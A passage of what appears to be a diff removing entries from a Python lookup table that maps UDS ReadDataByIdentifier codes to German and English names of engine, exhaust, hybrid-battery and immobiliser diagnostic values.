Betriebszust nde" # or Drive erlaubte Betriebszustaende -UDS_RDBI.dataIdentifiers[0x62c9] = "Drive Ursprungfehler" -UDS_RDBI.dataIdentifiers[0x62ca] = "Start Stopp Startanforderer Verursacher Motorlauf" -UDS_RDBI.dataIdentifiers[0x62cb] = "Start Stopp Startanforderer Verursacher Motorlauf" -UDS_RDBI.dataIdentifiers[0x62cc] = "Start Stopp Startanforderer Systemstart Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x62cd] = "Start Stopp Freigabe Zustandsberuhigung" -UDS_RDBI.dataIdentifiers[0x62ce] = "Drive Zustand Freigabe E Fahrt" -UDS_RDBI.dataIdentifiers[0x62cf] = "Start Stopp Startanforderung Zustand" -UDS_RDBI.dataIdentifiers[0x62d0] = "Engine In Use Histogram Ringpuffer OBL" -UDS_RDBI.dataIdentifiers[0x62d1] = "Drive Betriebsstrategie" -UDS_RDBI.dataIdentifiers[0x62df] = "Klimakompressor Drehzahl" -UDS_RDBI.dataIdentifiers[0x6300] = "Klimakompressor Strom" -UDS_RDBI.dataIdentifiers[0x6301] = "Klimakompressor Strom 48VEbene" -UDS_RDBI.dataIdentifiers[0x6302] = "Off Adaption Lernfilter Aktuell" -UDS_RDBI.dataIdentifiers[0x6303] = "Drive Lademoment minimal" -UDS_RDBI.dataIdentifiers[0x6304] = "DCDC HV Strom aktuell" -UDS_RDBI.dataIdentifiers[0x6305] = "Arbeitsdrehzahlregelung Aktivierungsbit plausibilisiert" -UDS_RDBI.dataIdentifiers[0x6306] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl plausibilisert" -UDS_RDBI.dataIdentifiers[0x6307] = "Arbeitsdrehzahlregelung Max Moment Anforderung" -UDS_RDBI.dataIdentifiers[0x6308] = "Arbeitsdrehzahlregelung Momentenanforderung" -UDS_RDBI.dataIdentifiers[0x6309] = "Bremslichtsignal" -UDS_RDBI.dataIdentifiers[0x630a] = "Arbeitsdrehzalregelung Drehzahlanforderung plausibel" -UDS_RDBI.dataIdentifiers[0x630b] = "Arbeitsdrehzalregelung Plausibilisierung Fehler" -UDS_RDBI.dataIdentifiers[0x630c] = "Arbeitsdrehzahlregelung Min Moment Anforderung" -UDS_RDBI.dataIdentifiers[0x630d] = "Arbeitsdrehzahlregelung Durchgriff" -UDS_RDBI.dataIdentifiers[0x630e] = "Arbeitsdrehzahlregelung Momentenvorgabe I Anteil" -UDS_RDBI.dataIdentifiers[0x630f] = "Arbeitsdrehzahlregelung Momentenvorgabe P Anteil" -UDS_RDBI.dataIdentifiers[0x6310] = "Arbeitsdrehzahlregelung Momentenvorgabe D Anteil" -UDS_RDBI.dataIdentifiers[0x6311] = "Motormoment Max" -UDS_RDBI.dataIdentifiers[0x6312] = "Motormoment Min" -UDS_RDBI.dataIdentifiers[0x6313] = "Arbeitsdrehzahlregelung aktiv" -UDS_RDBI.dataIdentifiers[0x6314] = "Arbeitsdrehzahlregelung aktiv Sq" -UDS_RDBI.dataIdentifiers[0x6315] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl" -UDS_RDBI.dataIdentifiers[0x6316] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl Sq" -UDS_RDBI.dataIdentifiers[0x6317] = "Arbeitsdrehzahlregelung Info Plaus Fehler" -UDS_RDBI.dataIdentifiers[0x6330] = "Head Unit Variante Ruecksetzen erfolgreich" -UDS_RDBI.dataIdentifiers[0x6331] = "Luftmassenaenderung Pro Arbeitsspiel" -UDS_RDBI.dataIdentifiers[0x6332] = "Momentenanforderung Durch Reduzierstufe Ist" -UDS_RDBI.dataIdentifiers[0x6333] = "Momentenanforderung Durch Reduzierstufe Soll" -UDS_RDBI.dataIdentifiers[0x6334] = "Abgastemperatur Im Hauptkat Modelliert" -UDS_RDBI.dataIdentifiers[0x6335] = "Kat (DE" -UDS_RDBI.dataIdentifiers[0x6336] = "Phasengebernotlauf Phasensuche aktiv" -UDS_RDBI.dataIdentifiers[0x6337] = "Gangvorgabe" -UDS_RDBI.dataIdentifiers[0x6338] = "Ganganzeige aktueller Gang" -UDS_RDBI.dataIdentifiers[0x6339] = "Ganganzeige Zielgang" -UDS_RDBI.dataIdentifiers[0x633a] = "Abgastemperatur Nach Hauptkat Modelliert" -UDS_RDBI.dataIdentifiers[0x633b] = "Nach Kat (DE" -UDS_RDBI.dataIdentifiers[0x633c] = "Abgastemperatur Im Frontkat Modelliert" -UDS_RDBI.dataIdentifiers[0x633e] = "Abgastemperatur Im Kruemmer Modelliert" -UDS_RDBI.dataIdentifiers[0x6340] = "Ganganzeige aktuell eingelegter Gang" -UDS_RDBI.dataIdentifiers[0x6341] = "Ganganzeige aktuell eingelegter Gang SignalQualifier" -UDS_RDBI.dataIdentifiers[0x6342] = "Programmierbares Sondermodul Fehlerergebnis Start Stop" -UDS_RDBI.dataIdentifiers[0x6343] = "Programmierbares Sondermodul Motor Fern Stop aktiv" -UDS_RDBI.dataIdentifiers[0x6344] = "Programmierbares Sondermodul Motor Fern Start aktiv" -UDS_RDBI.dataIdentifiers[0x6345] = "Fahrzeuggeschwindigkeit Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x6346] = "Fahrzeuggeschwindigkeit" -UDS_RDBI.dataIdentifiers[0x6347] = "Ueberwachung Freigabe Schluesselstart" -UDS_RDBI.dataIdentifiers[0x6350] = "Powernet Data Hochvolt " -UDS_RDBI.dataIdentifiers[0x6351] = "Fahrzeuggeschwindigkeit ungefiltert" -UDS_RDBI.dataIdentifiers[0x6355] = "Kundenereignis erforderlich" -UDS_RDBI.dataIdentifiers[0x6356] = "Schuetzschaltung Verhinderer Cat1 Fehler" -UDS_RDBI.dataIdentifiers[0x6357] = "Schuetzschaltung Verhinderer Cat1 SNA" -UDS_RDBI.dataIdentifiers[0x6358] = "Schuetzschaltung Verhinderer Cat2 Fehler" -UDS_RDBI.dataIdentifiers[0x6359] = "Schuetzschaltung Verhinderer Cat2 SNA" -UDS_RDBI.dataIdentifiers[0x6360] = "Messe Modus" -UDS_RDBI.dataIdentifiers[0x6361] = "Automatikgetrtiebe Schaltmodus PT4" -UDS_RDBI.dataIdentifiers[0x6362] = "Automatikgetrtiebe man Modus permanent PT3" -UDS_RDBI.dataIdentifiers[0x6364] = "Standy Mode aktiv" -UDS_RDBI.dataIdentifiers[0x6370] = "Laufzeit gesamt" -UDS_RDBI.dataIdentifiers[0x6371] = "Laufzeit gesamt" -UDS_RDBI.dataIdentifiers[0x6372] = "Fahrzeuggeschwindigkeit CAN" -UDS_RDBI.dataIdentifiers[0x6373] = "ESP Drehmomentanforderung Sperre" -UDS_RDBI.dataIdentifiers[0x6374] = "ART Momentenschnittstelle Sperre" -UDS_RDBI.dataIdentifiers[0x6375] = "Drehmomentanforderung Sperre irreversibel" -UDS_RDBI.dataIdentifiers[0x6376] = "Erststartmodus" -UDS_RDBI.dataIdentifiers[0x6377] = "Zuendung" -UDS_RDBI.dataIdentifiers[0x6378] = "Tempomat Momentenanforderung" -UDS_RDBI.dataIdentifiers[0x6379] = "Tempomat Momentenanforderung Sq" -UDS_RDBI.dataIdentifiers[0x637a] = "On Adaption Status DMDADAP" -UDS_RDBI.dataIdentifiers[0x637b] = "On Adaption Fertig Bereich unten" -UDS_RDBI.dataIdentifiers[0x637c] = "On Adaption Fertig Bereich Mitte" -UDS_RDBI.dataIdentifiers[0x637d] = "On Adaption Fertig Bereich oben" -UDS_RDBI.dataIdentifiers[0x637e] = "Off Adaption Zaehlindex" -UDS_RDBI.dataIdentifiers[0x6380] = "Tempomat Momentenanforderung Erh hung" -UDS_RDBI.dataIdentifiers[0x6381] = "ESP SBC Momentenanforderung" -UDS_RDBI.dataIdentifiers[0x6382] = "ESP SBC Momentenanforderung Sq" -UDS_RDBI.dataIdentifiers[0x6383] = "Getriebe Momentenanforderung" -UDS_RDBI.dataIdentifiers[0x6384] = "Getriebe Momentenanforderung Sq" # or Zuendung Zaehler Gesamt -UDS_RDBI.dataIdentifiers[0x6385] = "Getriebe Momentenwunsch max" -UDS_RDBI.dataIdentifiers[0x6386] = "W hlhebelpositionssensor Fehler y Richtung" -UDS_RDBI.dataIdentifiers[0x6387] = "Waehlhebeldiagnose Min Motormoment" -UDS_RDBI.dataIdentifiers[0x6388] = "Abgasklappe Endstufe Sollwert PWM" -UDS_RDBI.dataIdentifiers[0x6389] = "Abgasklappe Zustandsautomat Vorgaengerbetriebsart" -UDS_RDBI.dataIdentifiers[0x6390] = "Abgasklappe Position Winkel" -UDS_RDBI.dataIdentifiers[0x6391] = "Abgasklappe Sollwert" -UDS_RDBI.dataIdentifiers[0x6392] = "Abgasklappe Lageregelung Sollwert intern" -UDS_RDBI.dataIdentifiers[0x6393] = "Abgasklappe Sollwert final" -UDS_RDBI.dataIdentifiers[0x6394] = "Abgasklappe Endstufe Spannung Sq" -UDS_RDBI.dataIdentifiers[0x6395] = "Abgasklappe Losreisszaehler aktiv" -UDS_RDBI.dataIdentifiers[0x6396] = "Abgasklappe Temperatur Sq" -UDS_RDBI.dataIdentifiers[0x6397] = "Abgasklappe Zaehler Fehlerheilung" -UDS_RDBI.dataIdentifiers[0x6398] = "Motorzustand aktuell" -UDS_RDBI.dataIdentifiers[0x6399] = "Drehzahl Antriebsstrang gefiltert" -UDS_RDBI.dataIdentifiers[0x6406] = "Anzahl restl. Fahrzyklen f. Stoppverbot im Fahrzeugwerk" -UDS_RDBI.dataIdentifiers[0x6407] = "Stoppverbot durch irreversible Fehlerreaktion mit Kraftstoffabschaltung" -UDS_RDBI.dataIdentifiers[0x6420] = "Gemischadaption FAPAFG laeuft" -UDS_RDBI.dataIdentifiers[0x6421] = "Gemischadaption FAPAFG fertig" -UDS_RDBI.dataIdentifiers[0x6422] = "Gemischadaption FAPAFG Betriebspunktanzeige" -UDS_RDBI.dataIdentifiers[0x6423] = "Gemischadaption FAPAFG Reset Gradientenstabilitaet" -UDS_RDBI.dataIdentifiers[0x6424] = "Gemischadaption FAPAFG Reset Offsetstabilitaet" -UDS_RDBI.dataIdentifiers[0x6425] = "Gemischadaption FAPAFG Momenten Reserve" -UDS_RDBI.dataIdentifiers[0x6426] = "Gemischadaption FAPAFG DTC durch FAPAFG oder Basisfunktion" -UDS_RDBI.dataIdentifiers[0x6427] = "Gemischadaption FAPAFG Solldrehzahl" -UDS_RDBI.dataIdentifiers[0x6428] = "Gemischadaption FAPAFG Offset Massenstrom adaptiert" -UDS_RDBI.dataIdentifiers[0x6429] = "Gemischadaption FAPAFG Offset Saugrohrdruck adaptiert" -UDS_RDBI.dataIdentifiers[0x642a] = "Gemischadaption FAPAFG Lastanforderung" -UDS_RDBI.dataIdentifiers[0x642b] = "Gemischadaption FAPAFG Abbruchgrund Ueberwachung" -UDS_RDBI.dataIdentifiers[0x642c] = "Gemischadaption FAPAFG Ueberwachung freigeschaltet" -UDS_RDBI.dataIdentifiers[0x6430] = "Saugrohrdruck gefiltert" -UDS_RDBI.dataIdentifiers[0x6431] = "Motordrehmoment koordiniert fuer Fuellung" -UDS_RDBI.dataIdentifiers[0x6432] = "Saugrohrdruck gefiltert plausibilisiert" -UDS_RDBI.dataIdentifiers[0x6433] = "Motordrehmoment Referenzmoment" -UDS_RDBI.dataIdentifiers[0x6434] = "Motordrehmoment Verlust gefiltert" -UDS_RDBI.dataIdentifiers[0x6435] = "Off Adaption Fertig Bereich1 EOL" -UDS_RDBI.dataIdentifiers[0x6436] = "Off Adaption Lernfilter Aktuell KatheizSegment" -UDS_RDBI.dataIdentifiers[0x6437] = "Off Adaption Lernfilter Resetzaehler" -UDS_RDBI.dataIdentifiers[0x6438] = "Off Adaption Lernfilter Resetzaehler KatheizSegment" -UDS_RDBI.dataIdentifiers[0x6439] = "Off Adaption Ergebniswert DMDFOF3 KatheizSegment" -UDS_RDBI.dataIdentifiers[0x643a] = "Off Adaption Filterwert Segmentabw KatheizSegment" -UDS_RDBI.dataIdentifiers[0x643b] = "Off Adaption korrigierte Segmentdauer" -UDS_RDBI.dataIdentifiers[0x6442] = "Ladedruck Regelabweichung" -UDS_RDBI.dataIdentifiers[0x6443] = "Ladedruck Regelabweichung gemittelt" -UDS_RDBI.dataIdentifiers[0x6444] = "Ladedruckregelung I Anteil" -UDS_RDBI.dataIdentifiers[0x6445] = "Ladedruckregelung Sollwert" -UDS_RDBI.dataIdentifiers[0x6450] = "Start Stop Analysewerte Fehlercode1" -UDS_RDBI.dataIdentifiers[0x6451] = "Start Stop Analysewerte Fehlercode2" -UDS_RDBI.dataIdentifiers[0x6452] = "Start Stop Analysewerte Fehlercode3" -UDS_RDBI.dataIdentifiers[0x6453] = "Start Stop Analysewerte Fehlercode4" -UDS_RDBI.dataIdentifiers[0x6454] = "Start Stop Analysewerte Fehlercode5" -UDS_RDBI.dataIdentifiers[0x6455] = "Ueberwachung Status Diagnose1" -UDS_RDBI.dataIdentifiers[0x6456] = "Ueberwachung Status Diagnose2" -UDS_RDBI.dataIdentifiers[0x6457] = "Bremsmoment Fahrer" -UDS_RDBI.dataIdentifiers[0x6458] = "Motorkuehlkreislauf Temperatur" -UDS_RDBI.dataIdentifiers[0x6459] = "Umgebungsvariable1" -UDS_RDBI.dataIdentifiers[0x6460] = "Umgebungsvariable2" -UDS_RDBI.dataIdentifiers[0x6461] = "Umgebungsvariable3" -UDS_RDBI.dataIdentifiers[0x6470] = "Expansionsventil Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x6471] = "Drehschieberventil Fail Safe Ena Flag" -UDS_RDBI.dataIdentifiers[0x6472] = "Drehschieberventil Hybrid Codier Byte Fehler" -UDS_RDBI.dataIdentifiers[0x6473] = "Drehschieberventil Hybrid Codier Byte Fehler" -UDS_RDBI.dataIdentifiers[0x6474] = "Drehschieberventil BMS Fail Safe Ena Flag" -UDS_RDBI.dataIdentifiers[0x6475] = "Kuehlmittelpumpe Ladeluft Bypass Drehzahl" -UDS_RDBI.dataIdentifiers[0x6476] = "Kuehlmittelpumpe Ladeluft Bypass Drehzahl Sq" -UDS_RDBI.dataIdentifiers[0x6477] = "Kuehlmittelpumpe Ladeluft Bypass Fehler" -UDS_RDBI.dataIdentifiers[0x6478] = "Kuehlmittelpumpe Ladeluft Sollwert Sq" -UDS_RDBI.dataIdentifiers[0x6479] = "Kuehlmittelpumpe NT1 Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x6480] = "Kuehlmittelpumpe LVPTC Fehler" -UDS_RDBI.dataIdentifiers[0x6481] = "Kuehlmittelpumpe BMS Drehzahl" -UDS_RDBI.dataIdentifiers[0x6482] = "Kuehlmittelpumpe BMS Sollwert Sq" -UDS_RDBI.dataIdentifiers[0x6483] = "Kuehlmittelpumpe BMS Bypass Fehler" -UDS_RDBI.dataIdentifiers[0x6484] = "Kuehlerjalousie LIN Istposition" -UDS_RDBI.dataIdentifiers[0x6485] = "Kuehlerjalousie LIN Status Init" -UDS_RDBI.dataIdentifiers[0x6486] = "Kuehlerjalousie LIN Fehlerheilung max" -UDS_RDBI.dataIdentifiers[0x6487] = "Kuehlerjalousie LIN Umgebungsdaten" -UDS_RDBI.dataIdentifiers[0x6490] = "Luefteranforderung Ladeluftkuehlung" -UDS_RDBI.dataIdentifiers[0x6491] = "Luefteraktivierung Anforderung Sq" -UDS_RDBI.dataIdentifiers[0x6492] = "Luefter LIN Umgebungsdaten" -UDS_RDBI.dataIdentifiers[0x649c] = "Gemischadaption Prioritaet Count Down Zeitzaehler" -UDS_RDBI.dataIdentifiers[0x64a0] = "Aussetzer Laufunruhe Testgroesse zu gross akt Betriebsbereich" -UDS_RDBI.dataIdentifiers[0x64a1] = "Aussetzer Laufunruhe zu gross akt Betriebsbereich" -UDS_RDBI.dataIdentifiers[0x64a2] = "Aussetzer erkannt" -UDS_RDBI.dataIdentifiers[0x6500] = "Ueberwachung Reset Status 0" -UDS_RDBI.dataIdentifiers[0x6501] = "Innenwiderstand HV-Batterie beim Laden" -UDS_RDBI.dataIdentifiers[0x6502] = "Innenwiderstand HV-Batterie beim Entladen" -UDS_RDBI.dataIdentifiers[0x6503] = "Batteriestrom der HV-Batterie" -UDS_RDBI.dataIdentifiers[0x6504] = "Stromintegral zur Bestimmung der Kapazitaet der HV-Batterie" # or Ueberwachung Reset Status 4 -UDS_RDBI.dataIdentifiers[0x6505] = "Ueberwachung Reset Status 5" # or Ladezustand (SOC) der HV-Batterie -UDS_RDBI.dataIdentifiers[0x6506] = "Ueberwachung Reset Status 6" # or Ladezustand (SOC) der HV-Batterie nach Spannungs-tabelle -UDS_RDBI.dataIdentifiers[0x6507] = "Ueberwachung Reset Status 7" -UDS_RDBI.dataIdentifiers[0x6508] = "Ueberwachung Software Reset Status 0" -UDS_RDBI.dataIdentifiers[0x6509] = "Ueberwachung Software Reset Status" -UDS_RDBI.dataIdentifiers[0x6510] = "OCV-Kennlinie der HV-Batterie" -UDS_RDBI.dataIdentifiers[0x6511] = "Ueberwachung Software Reset Status" -UDS_RDBI.dataIdentifiers[0x6512] = "Ueberwachung Software Reset Status 4" -UDS_RDBI.dataIdentifiers[0x6513] = "Ueberwachung Software Reset Status 5" -UDS_RDBI.dataIdentifiers[0x6514] = "Ueberwachung Software Reset Status 6" -UDS_RDBI.dataIdentifiers[0x6515] = "Ueberwachung Software Reset Status 7" -UDS_RDBI.dataIdentifiers[0x6527] = "Ueberwachung Ebene2 Limit Max Moment" -UDS_RDBI.dataIdentifiers[0x6528] = "Ueberwachung Ebene2 Limit Min Moment" -UDS_RDBI.dataIdentifiers[0x6529] = "Ueberwachung Moment koord max Wert" -UDS_RDBI.dataIdentifiers[0x6530] = "Momentenwunsch Fahrer effektiv" -UDS_RDBI.dataIdentifiers[0x6531] = "Ueberwachung ESP koord Sollmoment" -UDS_RDBI.dataIdentifiers[0x6532] = "Ueberwachung ESP koord Sollmoment" -UDS_RDBI.dataIdentifiers[0x6533] = "Ueberwachung ESP lim koord Sollmoment" -UDS_RDBI.dataIdentifiers[0x6534] = "Ueberwachung PT Istmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6535] = "Ueberwachung zul Sollmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6536] = "Ueberwachung Verbrennungsmotor Sollmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6537] = "Ueberwachung red Sollmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6538] = "Ueberwachung PT Sollmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6539] = "Ueberwachung PT lim Sollmoment Ebene" -UDS_RDBI.dataIdentifiers[0x6540] = "Klopferkennung Referenzpegel HWZyl1" # or Ueberwachung Istgang plaus Ebene -UDS_RDBI.dataIdentifiers[0x6541] = "Ueberwachung Gesamtbremsmoment plaus Ebene" # or Klopferkennung Referenzpegel HWZyl2 -UDS_RDBI.dataIdentifiers[0x6542] = "Ueberwachung E Maschine Istmoment plaus Ebene" # or Klopferkennung Referenzpegel HWZyl3 -UDS_RDBI.dataIdentifiers[0x6543] = "Ueberwachung Verbrennungsmotor Drehzahl Ebene" -UDS_RDBI.dataIdentifiers[0x6544] = "Verbrennungsmotor Start abgeschlossen" -UDS_RDBI.dataIdentifiers[0x6545] = "Enermanag Losfahrschutz aktiv" -UDS_RDBI.dataIdentifiers[0x6546] = "Vorklimatisierung Konditionierung aktiv" -UDS_RDBI.dataIdentifiers[0x6572] = "Ueberwachung Hybrid Status Diagnose Ebene2" -UDS_RDBI.dataIdentifiers[0x6580] = "Lambdaabweichung HWZyl1" -UDS_RDBI.dataIdentifiers[0x6581] = "Lambdaabweichung HWZyl2" -UDS_RDBI.dataIdentifiers[0x6582] = "Lambdaabweichung HWZyl3" -UDS_RDBI.dataIdentifiers[0x65a0] = "Aussetzerzaehler Homogen HWZyl1" -UDS_RDBI.dataIdentifiers[0x65a1] = "Aussetzerzaehler Homogen HWZyl2" -UDS_RDBI.dataIdentifiers[0x65a2] = "Aussetzerzaehler Homogen HWZyl3" -UDS_RDBI.dataIdentifiers[0x65c1] = "Schubabschalte Bereitschaft Bauteileschutz" -UDS_RDBI.dataIdentifiers[0x65c2] = "Schubabschalte Bereitschaft TEV Schliessen" -UDS_RDBI.dataIdentifiers[0x65c4] = "Schubabschalte Bereitschaft Freigabe" -UDS_RDBI.dataIdentifiers[0x65c5] = "Schubabschalte Bereitschaft Abgastemperaturmodell" -UDS_RDBI.dataIdentifiers[0x65c6] = "Abgasstrang Bauteileschutz aktiv" -UDS_RDBI.dataIdentifiers[0x65e0] = "FBS Renault Diagnosedaten verfuegbar" -UDS_RDBI.dataIdentifiers[0x65e1] = "FBS Renault Diagnosedaten Teil1" -UDS_RDBI.dataIdentifiers[0x65e2] = "FBS Renault Diagnosedaten Teil2" -UDS_RDBI.dataIdentifiers[0x65e3] = "FBS Renault Diagnosedaten Teil3" -UDS_RDBI.dataIdentifiers[0x65e4] = "FBS Renault Startfreigabe Steuergeraet" -UDS_RDBI.dataIdentifiers[0x65e5] = "FBS Renault Startfreigabe EZS gesichert" -UDS_RDBI.dataIdentifiers[0x65e6] = "FBS Renault Startfreigabe EZS Autorisierung" -UDS_RDBI.dataIdentifiers[0x65e7] = "FBS Renault Startfreigabe EZS Kommunikation" -UDS_RDBI.dataIdentifiers[0x65e8] = "FBS Renault Startfreigabe" -UDS_RDBI.dataIdentifiers[0x6640] = "Tempomat" -UDS_RDBI.dataIdentifiers[0x6667] = "Motorzustand Nachstartanreicherung abgeschaltet" -UDS_RDBI.dataIdentifiers[0x6800] = "Egf flgDtm" # or EGFC DTM EGFC DTM -UDS_RDBI.dataIdentifiers[0x6801] = "EgfPwrStg ctrSt" # or EGFC Hw State EGFC Hw State -UDS_RDBI.dataIdentifiers[0x6802] = "EGFC Err Mode EGFC Err" # or Egf sq -UDS_RDBI.dataIdentifiers[0x6803] = "SCRT Err Mode SCRT Err" -UDS_RDBI.dataIdentifiers[0x6804] = "EgfAgSnsr1Volt sq" # or EGFP Raw Err Mode EGFP Raw Err -UDS_RDBI.dataIdentifiers[0x6805] = "LEGRT Raw Err Mode LEGRT Raw Err" -UDS_RDBI.dataIdentifiers[0x6806] = "TSPC Med Err Mode TSPC Med Err" -UDS_RDBI.dataIdentifiers[0x6807] = "LEGRFP Raw Err Mode LEGRFP Raw Err" # or EgrfAgSnsr1Volt sq -UDS_RDBI.dataIdentifiers[0x6808] = "EGT Err Mode EGT Err" -UDS_RDBI.dataIdentifiers[0x6809] = "LEGRT Err Mode LEGRT Err" -UDS_RDBI.dataIdentifiers[0x680a] = "DPFLR PDiff Raw Err" # or LEGR PDiff Raw Err Mode LEGR PDiff Raw Err -UDS_RDBI.dataIdentifiers[0x680b] = "AAP Err Mode AAP Err" -UDS_RDBI.dataIdentifiers[0x680c] = "EGP Err Mode EGP Err" -UDS_RDBI.dataIdentifiers[0x680d] = "ECT Err Mode ECT Err" -UDS_RDBI.dataIdentifiers[0x680e] = "DPFLR Pdiff Err" # or LEGR Pdiff Err Mode LEGR PDiff Err -UDS_RDBI.dataIdentifiers[0x680f] = "EGFP Err Mode EGFP Err" # or EgfPosn sq -UDS_RDBI.dataIdentifiers[0x6810] = "Eng Run Mode Eng Run" -UDS_RDBI.dataIdentifiers[0x6811] = "IgnSwRun Mode IgnSwRun" -UDS_RDBI.dataIdentifiers[0x6812] = "Exhaust gas flap EGFC BreakAway ActvCntr" # or EGFC BreakAway ActvCntr EGFC BreakAway ActvCntr -UDS_RDBI.dataIdentifiers[0x6813] = "EgfPosnLrn flgAcv" # or EGFC PosnLrn Actv Mode EGFC PosnLrn Actv -UDS_RDBI.dataIdentifiers[0x6814] = "EGFC PosnLrn EnvAbtd Mode EGFC PosnLrn EnvAbtd" # or EgfPosnLrn flgAbtd -UDS_RDBI.dataIdentifiers[0x6815] = "EGFC PosnLrn Err Mode EGFC PosnLrn Err" # or EgfPosnLrn flgFlt -UDS_RDBI.dataIdentifiers[0x6816] = "EGFC PosnLrn Rdy Mode EGFC PosnLrn Rdy" # or EgfPosnLrn flgRdy -UDS_RDBI.dataIdentifiers[0x6820] = "EgfPwrStgVolt Volt" -UDS_RDBI.dataIdentifiers[0x6821] = "st EgrfDiagcTest" # or Egrf flgDtm -UDS_RDBI.dataIdentifiers[0x6822] = "st EgrfPwrStg" # or EgrfPwrStg ctrSt -UDS_RDBI.dataIdentifiers[0x6823] = "EgrfPosnCtl percSpDtm" # or perc EgrfAgSpDiag -UDS_RDBI.dataIdentifiers[0x6824] = "err Egrf" # or Egrf sq -UDS_RDBI.dataIdentifiers[0x6825] = "EgrfPwrStg percPwmSp" # or perc EgrfPwmSp -UDS_RDBI.dataIdentifiers[0x6826] = "st Egrf" -UDS_RDBI.dataIdentifiers[0x682b] = "flg ErgfPosnLrnAbtd" # or EgrfPosnLrn flgAbtd -UDS_RDBI.dataIdentifiers[0x682c] = "flg EgrfPosnLrnFlt" # or EgrfPosnLrn flgFlt -UDS_RDBI.dataIdentifiers[0x682d] = "n Eng" -UDS_RDBI.dataIdentifiers[0x682e] = "In vehicle total distance Read In vehicle total distance" -UDS_RDBI.dataIdentifiers[0x6834] = "flg EgrfPosnLrnSucs" # or EgrfPosnLrn flgSucs -UDS_RDBI.dataIdentifiers[0x6835] = "perc EgrfAgSp" # or EgrfPosnCtl percSp -UDS_RDBI.dataIdentifiers[0x6836] = "EgfPwrStg flgSwOffReq" # or Exhaust gas flap PwrOffReq -UDS_RDBI.dataIdentifiers[0x6837] = "Exhaust gas flap EngStrtDis" # or EgfSm flgEngStrtDi -UDS_RDBI.dataIdentifiers[0x6838] = "Exhaust gas flap PosnLrn succ mode" # or EgfPosnLrn flgSucs -UDS_RDBI.dataIdentifiers[0x6839] = "LEGRT Tdrift Freeze" -UDS_RDBI.dataIdentifiers[0x683a] = "LEGRT Tdrift Freeze" -UDS_RDBI.dataIdentifiers[0x683b] = "LEGRT Phys Max" -UDS_RDBI.dataIdentifiers[0x683c] = "LEGRT Start" -UDS_RDBI.dataIdentifiers[0x683f] = "EgfSm ctrSt" -UDS_RDBI.dataIdentifiers[0x6841] = "EgrfPwrStgVolt Volt" -UDS_RDBI.dataIdentifiers[0x6b00] = "Read MIB Entry" -UDS_RDBI.dataIdentifiers[0xaa01] = "Module Temp Sensor 5" -UDS_RDBI.dataIdentifiers[0xaa02] = "Module Temp Sensor 5 Voltage" -UDS_RDBI.dataIdentifiers[0xaa03] = "Inlet Coolant Temp Sensor" -UDS_RDBI.dataIdentifiers[0xaa04] = "Inlet Coolant Temp Sensor Voltage" -UDS_RDBI.dataIdentifiers[0xaa05] = "Pump" -UDS_RDBI.dataIdentifiers[0xaa21] = "Module 21 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa22] = "Module 22 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa23] = "Module 23 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa24] = "Module 24 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa25] = "Module 25 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa26] = "Module 26 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0xaa27] = "Liquid Coolant outlet Temp Voltage" -UDS_RDBI.dataIdentifiers[0xaa28] = "Liquid Coolant outlet Temp" -UDS_RDBI.dataIdentifiers[0xaa29] = "Liquid Coolant Pump Command" -UDS_RDBI.dataIdentifiers[0xaa30] = "Liquid Coolant Pump Speed feedback" -UDS_RDBI.dataIdentifiers[0xaa31] = "Open Cable Detection status" -UDS_RDBI.dataIdentifiers[0xaa32] = "Status of Command of Pump Function" -UDS_RDBI.dataIdentifiers[0xaa33] = "Status of Command of FAN Function" -UDS_RDBI.dataIdentifiers[0xaa34] = "Status of Contactor Device Control Function" -UDS_RDBI.dataIdentifiers[0xaa35] = "battery Status of Isolation Fault Diagnostic Control " -UDS_RDBI.dataIdentifiers[0xaa36] = "Status of Contactor Weld Check" -UDS_RDBI.dataIdentifiers[0xaa37] = "Status of Active Discharge" -UDS_RDBI.dataIdentifiers[0xaa42] = "Control Module Voltage" -UDS_RDBI.dataIdentifiers[0xb000] = "Readiness Katalysator" -UDS_RDBI.dataIdentifiers[0xb001] = "iness Lufteinblasung" # or Readiness Sekundaerluftsystem -UDS_RDBI.dataIdentifiers[0xb002] = "iness O2 Sonde" # or Readiness O2-Sonde -UDS_RDBI.dataIdentifiers[0xb003] = "iness O2 Sondenheizung" # or Readiness O2-Sondenheizung -UDS_RDBI.dataIdentifiers[0xb004] = "ora2 LR-Adaption Additiv" -UDS_RDBI.dataIdentifiers[0xb005] = "ora LR-Adaption Additiv" # or Zyklusflag GA LR Adaption Additiv -UDS_RDBI.dataIdentifiers[0xb006] = "fra2 LR-Adaption Multiplikativ" -UDS_RDBI.dataIdentifiers[0xb007] = "fra LR-Adaption Multiplikativ" # or Zyklusflag GA LR Adaption Multiplikativ -UDS_RDBI.dataIdentifiers[0xb008] = "dylsu LSU Dynamikdiagnose" # or Zyklusflag LSU Dynamikdiagnose -UDS_RDBI.dataIdentifiers[0xb009] = "dylsu2 LSU Dynamikdiagnose" -UDS_RDBI.dataIdentifiers[0xb010] = "helsu LSU Fehlerpfad HELSU" -UDS_RDBI.dataIdentifiers[0xb011] = "EZS Typ Baureihe" # or helsu2 LSU Fehlerpfad HELSU, EZS Typ -UDS_RDBI.dataIdentifiers[0xb012] = "Zyklusflag LS Heizung Hinter Hauptkat" # or hsh LS Heizung hinter Kat (DE, HF Empfangsdaten -UDS_RDBI.dataIdentifiers[0xb013] = "hsh2 LS Heizung hinter Kat (DE" -UDS_RDBI.dataIdentifiers[0xb014] = "Zyklusflag LS Heizung Hinter Hauptkat Endstufe" # or hshe LS Heizung hinter Kat (DE -UDS_RDBI.dataIdentifiers[0xb015] = "hshe2 LS Heizung hinter Kat (DE" 